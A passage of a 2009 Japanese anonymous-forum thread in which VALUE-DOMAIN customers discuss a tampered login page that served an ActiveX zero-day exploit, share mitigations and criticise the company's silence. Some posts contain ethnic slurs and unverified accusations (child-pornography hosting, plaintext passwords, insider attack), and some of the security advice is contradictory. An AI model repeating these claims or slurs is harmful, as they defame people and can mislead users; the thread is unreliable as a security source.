00:26:31 0] 社員がここを見て気づくというオチ 115 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 00:30:46 0] 多分直接関係ないとはいえ、 お知らせ欄の「セキュリティ強化について」の文字が妙にむなしく感じる… 116 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 00:40:06 0] ユーザーが視認できるJavaScriptが削除されたにせよ、login.phpの内部処理が改竄されていたかどうかはユーザーには分からない。 一見対応されたかに見えても、プログラム内部の見えない部分まで確認したのかどうかは、VDのアナウンスを待つしかない。 login.phpが改竄されていたことには変わらない。 まだ危険は去っていないと考えるべきで、アナウンスがあるまでログインはおろか、 ttps://www.value-domain.com/login.php を開くことも控えるべき 117 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 00:44:17 0] DNSくらいは別に他使えばよかったけど、これはさすがにやっちまったなぁ…… VDは前、サーバー復旧できなくてサーバ丸ごと初期化したこともあったけど、 今回の問題はどこまで被害がでてるかわからないから、それなみのクラスの問題だな 118 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 00:52:06 P] ふぅ、 とりあえずjs切ってパス変えて、あどべ関連も一応最新チェックしといた。 俳人（廃人）の俺がここで一句 面倒くせぇ　あぁ面倒くせぇ　面倒くせぇ 119 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 00:53:06 0] >>116 login.phpが書き換えられたというよりも、 login.phpから読み込まれる別のファイルなりデータベースなりが書き換えられてるような気がする。 ユーザー名、パスワード、挿入されたscriptタグが、同じ形に整えられてるからな。 よくあるSQLインジェクションみたいなもんじゃないかなー 120 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 00:53:39 0] 改竄されていたのは login.php だけだったのか？ という疑問も残っている。 ログイン情報は、cookieに保存されるので、各ページのphpファイル内でcookieデータが送受信される。つーことは全phpファイルに改竄がなかったかチェックする必要がある。 どのページからでも情報漏洩の危険はあるってことだ。 さらに各phpファイルが内部でインクルードしていれば、そのファイルも全てチェックする必要がある。 このくらいできるよね＞VD社員 121 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 00:59:41 0] とりあえずサポートフォームから 「事は重大だから最低でも朝イチでアナウンスが欲しい」 っと送っておいた 質問カテゴリ＝利用前質問ならログイン無しでも送信できるしな 今の状況下でログインなんか怖くてできない 122 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 01:11:13 0] スレをちゃんと読まずに、>>72、>>118と同様、ログインしてパス変えてしまった login.phpの内部処理が改竄されていた場合、ログインしたユーザーには どんな被害があるの。whois情報が流出くらいならまだ許容できるんだけど 123 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 01:12:38 0] phpまでやられてたら、サーバでできることはほとんどなんでもできるよ 124 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 01:22:21 0] まあとにかく今は、VDの鯖がどの程度の被害を被ったのかアナウンスを待とうや phpの内部処理が改竄されている可能性を考慮すると、 ・JavaScriptをOFFにしてログインする ・以前のログイン情報がcookieに残っているユーザー（ログイン状態を維持しているユーザー）が、VDのサイトを開く ってのも控えたほうがいいと思われる。 つまりアナウンスを見に行くのですら気を使う必要があるかもね 既存のcookieを削除してから訪問するとか、ブラウザを変えるとか・・・ 125 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 01:27:20 P] ＞アナウンスを待とうや そのアナウンスが、素直に出てくるとでも思っているのかい？ 126 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 01:36:45 0] んなこた知るか 当然すべきことを期待しているだけだ 通信法、個人情報保護法etc・・・VDがどこまで法を犯すのかというのも楽しみではあるがね 127 名前：名無しさん＠お腹いっぱい。 [2009/07/07(火) 01:50:45 0] 当然すべきことを期待しているだけだ（大爆笑） 128 名前：名無しさん＠お腹いっぱい。 [2009/07/07(火) 02:02:31 0] たまたま見たらこんなことに・・・涙 ドメイン１００個以上使っているのでドビックリしてます。 129 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 02:10:20 0] >>128 何度目のビックリですか？ 130 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 02:19:20 0] この程度でビックリしているようじゃここは使えませんよ 131 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 02:28:16 0] 当然すべき事を意地でも徹底放置するのがデジロじゃないかｗ 132 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 02:33:57 0] なんでここって重大な障害等が発生してもいつも一切アナウンスしないの？ 133 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 02:36:43 0] 重大な障害じゃないんだよ。 ここでは鯖が1台どこかに消えちゃったとかが重大な障害 134 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 02:37:54 0] 入金やカネに関する事はマメにアナウンスするのになｗ 逆に言うとそれ以外の事は一切アナウンスしないｗ 135 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 02:39:30 0] アナウンスしたら負けだと思っています 136 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 02:44:17 P] これから他の鯖屋工作員も加勢して、賑やかなスレになりそうだね。 ギガジンが記事にしたらもぅ、それこそ七夕祭りだな（ﾜﾗ 137 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 02:45:41 0] 分かってない奴が多いねえ 鯖の障害をアナウンスしなかったこととは、チト違ってくる 法が絡むでのぉ 138 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 02:48:34 0] どんな法がどう絡んでくるの？ 具体的にどうぞ。 139 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 02:54:46 0] いちいち聞くな、自分で調べろ おっと、こーゆーときに「ググレカス」ってんだっけ 140 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 03:00:47 0] そんなわかりやすい逃げ打たれてもｗ 裏付けできないテキトーな事言うなって 141 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 03:12:56 0] 規約にこんなこと書いてあるからVDはなにもしなくてもＯＫ やるかやらないかはもはやVDの気分次第 VALUE DOMAIN サービス利用規約 　利用者は日本国内に在住で、且つ、日本語を理解できるものとします。 【責任の限界について】 　以下の事項に起因して発生する可能性のある損失について、 　当社及び上位レジストラは、利用者あるいは第三者に対して責任を負わないことに、 　利用者は同意するものとします。 ●あらゆる原因によって起こるドメインネーム登録の未完了、不可、損失 ●あらゆる非常事態が発生したことによる損失 142 名前：名無しさん＠お腹いっぱい。 [2009/07/07(火) 03:14:21 0] ググレカスって 逃げ口上にも使えるんだなあ 　　　　　　　　　　　　　　　みつを 143 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 03:16:57 0] なんつーか、毎度のことながら、鯖がクラックされるって酷すぎだよな また保守管理を委託してるシナ人の仕業なんじゃね？ あいつら、何度注意したって聞かねーし 144 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 03:29:44 0] 次はどんなハード調教をしてくれるんだろうと更なる期待が高まる 145 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 03:47:48 0] 次から次に、ここは何かとネタが尽きんなぁ・・・ 146 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 04:04:57 0] 今回の件すらアナウンスしないのなら引っ越しするかな 147 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 04:13:48 0] 俺は特定のドメイン以外は2月の障害の時点で全部移管したよ。 148 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 04:31:14 0] どこに移管したんだよ 149 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 04:35:58 0] >>148 毎度ｗ 150 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 06:10:39 0] >▼2009.07.02 >セキュリティ強化について 率先して強化しなければならないセキュリティーを間違えてるだろｗ 151 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 06:16:46 0] >>31-32 の件ですが、msvidctl.dllの脆弱性です。 アドバイザリ出ました。 ttp://www.microsoft.com/japan/technet/security/advisory/972890.mspx レジストリにkill bitを立てるか、以下の「Fix it」を押しましょう。 ttp://support.microsoft.com/kb/972890/ 他にpdfとswfも併用されていますが、こちらは既知の脆弱性なので AdobeReaderやFlashPlayerが最新バージョンであれば問題ありません。 152 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 07:48:48 0] 現時点でもまだVDログインページは修正されてないの？ 153 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 08:24:17 P] >>151 乙加齢臭 154 名前：121 mailto:sage [2009/07/07(火) 08:25:23 0] おはよう 朝起きたらサポートからの回答か3件も入っていてビビッた。いつものように放置だと思っていたのに。 コピペは控えるけど要約すると ・カスタマーサポート(受付部門)には「弊社担当部門（メンテ担当？）」からの報告が無い ・担当部門への申し送りは行う ・真偽確認＆アナウンスは担当部門の対応となる ってところかな。一応、事の重大さは認識しているようだ。 気になるのは「担当部門からの報告がない」ってところ。 つまり、昨日深夜にスクリプトが外れたのは、VDの操作ではなく、 仕掛けた本人による操作の可能性もあるということだ。 正式アナウンスがあるまで、ログインは控えた方が良いな。 155 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 08:28:02 0] しかし、速報でも何でも、公式アナウンスは絶対しないんだｗ ある意味潔いよねｗ デジロイズムｗ 156 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 08:41:44 0] いつも事あれば全て「担当部門(外注)」だな・・・ 157 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 08:51:22 0] 去年の広告鯖ウイルス混入の件の再来って感じだね 158 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 09:18:14 P] 誰か高木先生にチクってよ 159 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 09:29:38 0] 今wiki見たら前のウイルス事件の内容はいつの間にか記事削除されてるｗ 社員さんもそういう熱意を肝心なとこに向けてくれたらいいのにｗ 160 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 09:36:53 0] >>154 認識はいつも早いんだけど、その後放置でアナウンスせず黙殺だからいつもと変わらないのでは？ クレームにそういった内容の定型文を即返すって対応は従来通りだし しかし、これくらいの修正すら即できない人間しか社内にいないのか？ 外部丸投げがデフォでもちょっとひどすぎだろ 161 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 09:49:34 0] >>154 今回もやっぱり文末は 「騒がず黙って○週間待ってろカス共 ○週間の間は再度文句垂れてきてもシカトだからなコラ(意訳)」 な訳？ 162 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 09:51:14 0] :::::::::::::::(>'A`)>　ｳﾜｧｧｧｧ　::::::: :::::::::::::::( へへ ::::::::::::::::::::::::::::::::: 163 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 09:58:58 0] 今更ながら・・・ これはひどい 164 名前：121 [2009/07/07(火) 10:07:51 0] >>160 そーかもしれないけど、客としては待つしかないしなあ。 でも、俺も過去何度かサポートとやりとりしてるけど、深夜に送った奴に 深夜のウチに打ち返してきたのは初めてだったよ。 >>161 いや、見慣れたその定型文は今回は無いよ。 今回の件は顧客の財産（金やドメイン）に直接影響する問題なので 迅速かつ的確な対応をお願いしたいですな、VD様。 165 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 10:11:20 0] たしかにドメイン絡みで各種情報ぶっこ抜かれて改竄でも やられたら洒落にならん。 ここで管理してるあと数個のドメインも、あと少しで移管可 になるんで全部移管したいが怖くてログインできん。 166 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 10:15:40 0] 今はログインしても大丈夫？ まだ駄目？ 167 名前：名無しさん＠お腹いっぱい。 [2009/07/07(火) 10:18:30 0] 今回、ログイン部分が改ざんされ個人情報が脅かされたわけだろ？ 5000件以上の個人情報をデータベース等として所持し事業に用いている事業者は 必然的に個人情報取扱事業者に該当するんだよ。 該当する場合は個人情報保護法に乗っ取った運営をしなければならない。 今回、こういう被害受けたからには、デジロック側が個人情報保護法に基づき総務省に報告義務がある。 まさか登録者５０００件未満というわけでも無さそうだし。 それ以外にも、以前にも似たようなことがあったということから、 電気通信事業者としても注意義務違反にあたるかもしれない。 ここらへんは詳細わからないことには判断できないが。 とにかく、このまま放置で済む問題ではないのは確実だ。 168 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 10:22:10 0] 何が入ってるかわからんからログインするな。 169 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 10:32:17 0] >>154 やっぱり、「担当部門」=「前回広告鯖をクラックしたシナ人」=「今回ログインフォームを改ざんした犯人」なんじゃね？ だから、デジロの中の人が真偽確認してもレスポンスが悪い、と もう、大阪人は信用ならんなぁ 170 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 10:34:23 0] 大阪は大阪民国法が適用されるから日本国の法律には準拠しないよ 171 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 10:37:02 0] なんかサポ板の挙動がおかしいのもこの改竄の件関係あるのかな？ それとも6月頭から完全放置のネームサーバ障害のせいかな？ 172 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 11:25:47 0] これだけ被害だしといて、告知すらないとかありえないわ。 ウイルス配布元として訴えられてもしょうがないレベル 173 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 11:40:54 0] 別にデジロック擁護する気はないけど、被害って言ってもまだ別に表立った実害って報告されてないでしょ？ 徹底的に祭り上げられるか否かは今後の動向次第じゃないかな現時点では 速報なり何なりで即時何かしらの公式アナウンス出すべきだとは思うけどね 後に大事になった時に、認知しながらも被害拡大させた責任追及されて一番困るのはデジロックだろうから 174 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 11:49:39 0] て言うかまだ今の時点でログインページは改ざんされてるの？ どっちにしてもデジロが何もユーザーに対して説明しないと怖くてコンパネ入れないけど・・・ 175 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 11:52:48 0] ここはいつも通り、自然治癒力に頼るしか方法はありません 176 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 12:07:15 0] どうせまた内部犯行だろ 177 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 12:12:50 0] 技術者が逃げて外注に頼ってもお金が無くて素性の確かでない安いところに 頼んで乗っ取られたとかじゃない? 178 名前：名無しさん＠お腹いっぱい。 [2009/07/07(火) 12:25:29 0] 結局どうだったの？改竄はあったの？ 179 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 12:30:18 0] GENOみたいな商売ならだんまりでも 「まあGENOだしな」で済むだろうけど ここは腐っても鯖屋だぜ？ なるべく早急にまともな対応をしないと 冗談抜きに取り返しのつかないことになるかと 180 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 12:32:09 0] 改ざんがあったかどうかなんて、ログくらいよめよ 90レス番台あたりとかに、全部のってるじゃん 181 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 12:41:01 0] デジロなんて、コアサーバーの殆どが児童ポルノサイト運営させて沢山あるくらいだしな 全く何とも思ってないよ 182 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 12:43:35 0] もしなんらかの損害が発生しても、 「あらゆる非常事態が発生したことによる損失」に対する責任は負いません そういう規約ですから 183 名前：名無しさん＠お腹いっぱい。 [2009/07/07(火) 12:45:09 0] login.php　を元に戻したのが誰かが分からない限り、ログインするのは危険。 デジロが対応したのなら、そのことを告知すべき、 公式告知がない＝仕掛けた奴が操作している可能性あり。すると、ログインは危険 184 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 12:48:42 0] 待て… よく考えるんだ… これはトラブル続きで移管転出続出のデジロが仕組んだ逆転捨て身の移管防止策…！？ 185 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 12:51:55 0] 捨て身過ぎるだろｗ 186 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 12:57:28 0] ああそうか、鯖に安全宣言がなされてなければ、 じつはPOSTの受け取りを細工されてて、生パスが抜かれるかもしれんわけね 187 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 13:07:53 0] www.itmedia.co.jp/enterprise/articles/0907/07/news015.html Windowsにゼロデイの脆弱性、サイト改ざん攻撃が多発 MicrosoftのVideo ActiveX Controlにゼロデイの脆弱性が発覚した。何千ものWebサイトが改ざんされ、閲覧しただけでマルウェアに感染する状態になっているという。 　MicrosoftのWindowsに影響する新たな脆弱性が見つかり、これを悪用したゼロデイ攻撃が発生している。Microsoftは7月6日、アドバイザリーを公開して注意を呼び掛けた。 　Microsoftによると、脆弱性はVideo ActiveX Controlに存在し、Windows XPとWindows Server 2003が影響を受ける。Internet Explorer（IE）を使って悪用された場合、ユーザーが何もしなくてもリモートからコードを実行される恐れがある。 　SANS Internet Storm Centerによれば、この脆弱性を悪用するコードが中国の多数のWebサイトで公開され、それを使った攻撃が多発。何千ものWebサイトが改ざんされ、閲覧しただけでマルウェアに感染する状態になっているという。 　Microsoftは現在、脆弱性を解決するためのセキュリティアップデートを開発中。当面の回避策として、脆弱性のあるActiveX Control（msvidctl.dll）にキルビットを設定する方法を紹介している。自動的にこの回避策を適用できるツールも用意した。 　また、米McAfee、Symantecなど主要セキュリティ企業はウイルス対策ソフトの定義ファイルを更新し、今回の脆弱性の悪用コードを検出できるようにしたと発表している。 188 名前：名無しさん＠お腹いっぱい。 [2009/07/07(火) 13:09:17 0] さすがに基幹までのっとられるようになったら終わりだな 189 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 13:17:42 0] ここの外注も中華系だよね？ ったく・・・ 前のウイルスの件で懲りなかったのかよ・・・ 190 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 13:18:44 0] よく分からんけど 感染対象はIEで、vistaでは対象外って事でおｋ？ 191 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 13:22:48 0] ここの、 その後の正規サイト改ざん〔後篇〕(3):新たな攻撃手法〜「新Nine Ball」「8080」 www.so-net.ne.jp/security/news/view.cgi?type=2&no=1936 ここ読んどけ。 ●「8080」：大量ドメインを使用する8080攻撃 192 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 13:38:55 0] 2009.07.02 セキュリティ強化について ｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ 193 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 13:49:06 0] 配下サイトが全滅、恐怖の共有サーバー丸ごと改ざん〜「5+1」件の事例報告 www.so-net.ne.jp/security/news/view.cgi?type=2&no=1938 いやー、こわいねー 194 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 14:00:34 0] まさに今回のはデジロ狙い撃ちでしょ？ この業界で商売してて狙われてあっさり撃たれるデジロ…orz 195 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 14:11:52 0] 非常にお伝えしにくいのですが、実はVALUE-DOMAINのログインパスワードは、 ハッシュ化されていない、プレインテキスト記録なので、login.phpの書き変えが可能なら、 DBパスも取られているはずなので、もう既に全ユーザーのパスワードが割れて いることになるのです。 196 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 14:22:10 0] だとしたらlogin.phpを改竄する意味は？ 197 名前：名無しさん＠お腹いっぱい。 [2009/07/07(火) 14:22:55 0] デジロ、login.php の書き換え事件についての公式声明を早く出せ。 これでも、だんまり戦術が通用すると思っているのか？ 198 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 14:28:38 0] いつも通り放置してるだけですけどね 199 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 14:31:27 0] 鉄壁なマイペースｗ 200 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 14:35:21 0] 久々に来てみたら大変な事になっているじゃないか 今度のは今まででも最強だな・・・ ｵﾜﾀ 201 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 14:44:05 0] >>194 無差別攻撃で落ちたもののひとつなだけじゃないかと まだ発覚してないところがありそう 202 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 14:45:11 0] 今までも相当酷い障害はあったけど確かにこれは過去最強最凶クラスだ これで実際の被害報告なんかが出だしたらニュースサイト巻き込んで七夕祭だなｗ 203 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 14:49:41 0] 去年くらいから特に目だって続くこのデジロックの崩壊具合ったら何なの 204 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 14:50:17 0] >>194 動作からすると、感染経路はGENOとほぼ同じじゃないのかな。 そこから個別にlogin.phpに仕込むとか。。。ね。 ドメイン見れば美味しいエサってのはすぐ分かりそうだし、 domainでフィルタ読みされればイチコロ？ 205 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 15:31:20 0] とりあえずセキュリティホールmemoに取り上げられたから、かなり知れ渡ってるさ。 206 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 15:33:21 0] 何日の時点でログインしてたらアウト？ 207 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 15:39:10 0] ところでまだ捏造を唱える社員の火消しは来ないの? 208 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 15:44:49 0] ここ2〜3日はそれどころじゃないみたいだぞｗ 209 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 15:51:10 0] とりあえず安心して管理画面に入れない様じゃ何もできないんだが… 210 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 15:51:46 0] IPAも出ました〜 ttp://www.ipa.go.jp/security/ciadr/vul/20090707-ms-activex.html 211 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 16:00:32 O] とりあえず、管理ドメインを、enomのアカウントにプッシュしておいた。 さらに、enomアカウントのパスワード、メールアドレスを変更。 ロックもかけといた。 少し安心。。。 212 名前：名無しさん＠お腹いっぱい。 [2009/07/07(火) 16:22:31 0] ソースは２ちゃんって困るし詳しくない人もVD使ってるから公式にアナウンスだしてくれないだろうか 213 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 16:33:19 0] こっそり消すようなところに期待しても無駄かと。 214 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 16:49:02 0] SymantecによるとIE8だと大丈夫そうな…ほんとやろか。 itpro.nikkeibp.co.jp/article/NEWS/20090707/333313/ 215 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 16:56:02 0] FirefoxでVDの管理画面に入るのは、IEでないから大丈夫なの？ それとも同じく危険なのかな？ 216 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 16:59:41 0] php改ざんの可能性が否定できない今、ブラウザは関係ない 217 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 17:02:56 0] >>216 本質を分かっていない奴はけーん 218 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 17:07:16 0] そーすが２ちゃんだけだと誰にもおしえれんやろー！ 219 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 17:17:02 0] バカしかいないようだ 220 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 17:25:27 0] 要するにもう安全ってこと？ 221 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 17:26:49 0] IE6/7以外のブラウザなら問題ないんだろ Firefoxなら大丈夫だろ 222 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 17:30:29 O] ﾏｶｰで良かったﾅﾘ。 223 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 17:32:18 0] phpがなんだとかいってるのは関係ないんだ で、phpってなに？ 224 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 17:36:14 0] 本じゃない？ 225 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 17:36:29 0] 出版社 226 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 17:38:34 0] Vistaなら大丈夫なのか、よかった ようするにウイルス埋め込まれたってこと？ 感染しないなら関係ないや 227 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 17:39:54 0] ブラウザはXP、2003以前のIEだと攻撃を食らう だから、それ以外でログインしてるなら、埋め込みスクリプトからは身を守れる しかし、ログインフォームが改竄され、デジロ広報が把握してない誰かの手によって修復されたのが、現在残る懸念材料 こう易々と改竄されているとなると、一見正常なログインフォームでも内部をいじられている可能性がある だから、正式アナウンスが出てないうちは安易にログインしないほうがいいって話だ 228 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 17:44:03 0] よくわかんないけど、IE6/7はウイルスに感染するし、 かといって、ほかのブラウザでアクセスしても、こっちのブラウザに関係なくvalue-domain.comのサーバのほうで 何か情報送信とかしてるかもしれない、そんな二重の構えで待ち伏せされてる状態ってこと？ 229 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 17:46:07 0] co.ukとorg.ukのドメイン持ってるけど 移管できるとこがのきなみ高いっていうね… こりゃ参った 230 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 17:49:38 0] 情報源が2chなんて信用できんな 捏造かもしれん 231 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 17:50:26 0] テンプレの３、４って、どうなの？ 232 名前：名無しさん＠お腹いっぱい。 [2009/07/07(火) 17:51:49 0] login.php を変更したのが、誰なのか分からない内は、ログインすること自体が危険 デジロがlogin.phpの改ざんを発見して対応修正したのなら、まだいいが、 もし修正したのが「デジロ」なら、公式にアナウンスが来て当然 公式アナウンスが無い＝不安要素一杯　ということ。 233 名前：名無しさん＠お腹いっぱい。 [2009/07/07(火) 17:53:40 0] これは、他社の捏造ですよ。気にすることない。安全安全。 234 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 17:54:52 0] firefoでよかった！ 235 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 17:57:26 0] もうちょっと上手く釣ってくれよ あまりに白々しいとつまらんよ 236 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 18:02:24 0] このスレに名うての釣り師なんていないと思う 237 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 18:02:31 0] ２ちゃんねるの情報は信用ならん どっかのニュースサイトに取り上げられたら信用する 238 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 18:04:04 0] ３，４は今見たらエラーページになってた 昼、見たときは見れたんだけど 焦ったけど、一応>>85-86のコードはないみたい じゃあ>>180は 239 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 18:05:42 0] なんだただの捏造か 240 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 18:11:58 0] >>92の魚拓の中にドメイン移管方法ってページがある >>ttps://www.value-domain.com/howto/?action=transfer これで、どうでしょう？ 241 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 18:14:55 0] 魚拓は開かないほうがいい ウイルスいるから 242 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 18:15:15 0] 定期デジロマンセー厨は、ガチ社員とアンチ煽り基地外がいるよね 今湧いてるのは後者の方だね 243 名前：名無しさん＠お腹いっぱい。 [2009/07/07(火) 18:18:44 0] なにもなかった、捏造捏造、気にすることはない、デジロのセキュリティは鉄壁 244 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 18:26:04 0] まあこのまま大した実害報告もなく終息すれば例の如く公式アナウンス無く終息コースだね。 実害出なきゃ騒ぐ事でもないし。 ただ今回の件は事が事だけに、今後の成り行きはどうあれ何らかのアナウンスは必要だろうな。 245 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 18:27:26 0] 今のところ特にVDユーザーでサイト改竄されたとかの被害報告ないよね？ 246 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 18:29:15 0] 被害報告ないし大丈夫でしょ ログインページが改ざんされた程度だし 247 名前：名無しさん＠お腹いっぱい。 [2009/07/07(火) 18:30:33 0] 実害がないなら、アナウンスも不要 このスレ、早く埋めましょう 248 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 18:33:23 0] 揉み消し工作してんじゃねぇよ 249 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 18:33:26 P] 少なくとも昨夜から未明あたりに居たスレ住人は、検証してくれたり参考URL貼ってくれたり不明な点を解説してくれたり、 （デジロが法に触れるとか言いつつ根拠を問うとググレカスの一言で逃げた奴も居たけどｗ） 概してまともな書き込みが多かった気がするのだが、一晩経つと、こうも違うんだなぁという妙な感慨。 まぁ、予想通りだけどｗ 250 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/07(火) 18:47:41 0] 実害が今のところ報告されてないから… だけどね。あくまで。 どうあれデジロからの公式アナウンスが無いとおちおち管理画面にログインできないって状況は変わらないから、現時点で問題にすべきはその辺だろう。 251 名前：名無しさん＠お腹いっぱい。 [2009/07/07(火) 18:50:54 0] 